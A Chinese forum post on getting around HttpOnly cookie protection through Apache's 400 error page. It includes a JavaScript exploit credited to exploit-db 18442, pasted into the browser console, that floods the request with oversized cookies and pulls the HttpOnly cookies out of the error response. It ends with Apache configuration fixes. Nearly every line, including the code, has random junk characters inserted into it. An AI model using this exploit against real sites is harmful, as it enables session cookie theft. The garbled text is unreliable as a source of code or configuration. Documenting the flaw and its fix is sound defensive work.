很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。; o- y1 }# v1 R u( T( I
% [, ?4 J) i7 t+ M. y. J用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:1 }- E1 e! H% v+ Z$ j/ P
. G" a5 H5 f1 [3 J) z
6 M; ~1 G0 A% ~ m( X) H ^- ^+ z// http://www.exploit-db.com/exploits/18442/' i f& W) A, b V; q# Y% j
function setCookies (good) {: e( }0 F. L" {
// Construct string for cookie value" L9 H$ i* M" K
var str = "";
: G% U! F1 n4 H) ^for (var i=0; i< 819; i++) {1 u' k8 Y8 ?) f* j
str += "x";
+ o4 L* K: p3 K}
- d0 r7 {6 m. x5 {: R// Set cookies
# K9 H8 r/ j9 u/ s' sfor (i = 0; i < 10; i++) {
" a+ s0 z2 d# n5 i// Expire evil cookie
4 q& s, O/ I8 w a1 Xif (good) {
2 D3 d4 L) j# v8 H4 P1 }. z4 yvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";* X6 D6 |# F3 y2 T
}
* q) S4 m2 V7 \/ a% z// Set evil cookie
4 [1 `/ S5 ]" C- s; |else {7 m; x5 x$ B; X V* m' @
var cookie = "xss"+i+"="+str+";path=/";
* v6 l5 A9 [9 e* t}
. d, ^% d; f d* p9 h+ [& h0 Udocument.cookie = cookie;# \, D; O3 m* d" d* T
}3 f. c! X$ ]8 M( s
}
* q/ O( Q3 ~) I. Ufunction makeRequest() {& W1 V" \: G, H$ e, S4 w' b
setCookies();
' Q* x! U S. F& ?4 Nfunction parseCookies () {
/ X& S" ]' ^/ h- evar cookie_dict = {};' ?+ W% y8 ]5 Y1 J
// Only react on 400 status
1 |# w6 r7 G4 t: qif (xhr.readyState === 4 && xhr.status === 400) {
- ?- ^* l8 o/ p. N" G4 {// Replace newlines and match <pre> content( W4 b7 C" d1 G- T5 w
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+ d3 \8 G) N& Z0 d6 Z* ~4 g/ v. Tif (content.length) {" \3 i+ X6 g: P n2 B
// Remove Cookie: prefix
0 R( W1 E. V4 _, gcontent = content[1].replace("Cookie: ", "");( ]* b% R7 p8 C/ W5 A
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
% f& ]6 Q9 H$ I/ r- N5 p, G1 d// Add cookies to object
4 K- g ?/ Q a `for (var i=0; i<cookies.length; i++) {
4 f* \ P7 a @6 Cvar s_c = cookies.split('=',2);
8 K t) {4 x6 w3 t+ t! ocookie_dict[s_c[0]] = s_c[1];& z# R3 }5 e7 L+ x
}1 c" H2 z4 T6 c5 Z6 `) q0 n$ @
}
1 I- F( y3 ]3 e6 \// Unset malicious cookies3 M% l6 C9 l/ k1 o, e* A+ b
setCookies(true);
5 k* J6 F: p" s4 p+ s: }7 Palert(JSON.stringify(cookie_dict));
8 t$ N, p+ ^- M7 X8 V}
3 S( I/ ]2 E4 ^- h5 F, `; z1 D}
: Y. c( Q) L l" C! K* W// Make XHR request
a4 s, b, V: \; s$ F5 d& R- ~var xhr = new XMLHttpRequest();
% {" o" z' _; N `xhr.onreadystatechange = parseCookies;" y/ X0 q V( B3 w$ ]7 f( y
xhr.open("GET", "/", true);
/ F% _0 t& [: x( Z* {) Pxhr.send(null);
: b& t) X& B8 L, s}6 I3 A2 q) B+ R: r7 c' v
makeRequest();; Y4 K$ m+ R) X' T9 [8 p' a
4 c! ~2 F! z1 \6 V7 x
你就能看见华丽丽的400错误包含着cookie信息。
2 W) L7 j) v2 U# |: h% k! m- C$ F, m7 ^" T# r# F$ k
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
' x6 P) b! D, ^# g" G& i! `' u: i0 x- Z) U8 |4 x
修复方案: ^' C5 ^' Y+ x6 i
: [! K* O2 R0 G" wApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下0 O$ H! ~+ Y4 ^ Y; x" I
# C \& B# c4 f, JIn the event of a problem or error, Apachecan be configured to do one of four things,
( v& p/ e* B3 U: U' {
, ~8 n9 T' e0 X2 x/ c1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
/ N8 \7 Z* F6 c2. output acustomized message输出一段信息5 T* N2 r3 F8 d; b l
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
9 S: K( \* _ g2 d1 W4. redirect to an external URL to handle theproblem/error转向一个外部URL& \* M& G7 L+ d! w( c9 h8 f5 Z6 g
* t X9 v5 R6 c8 c6 W* H经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
/ c, x: l7 e+ i9 s% I
$ d$ F, a* l+ }: R5 {- ?Apache配置:" C* ~- _2 p5 j& a Z1 f8 b
. y0 [8 l( z7 `ErrorDocument400 " security test"* E( T# } C. p P; ?* x
3 v( t5 z3 j+ h4 m当然,升级apache到最新也可:)。
D& T! }8 y* v% j9 u6 Y
7 K8 H @5 h7 f' U参考:http://httpd.apache.org/security/vulnerabilities_22.html
- W; m& ~! a, {1 k
1 p, _9 q: B/ \ |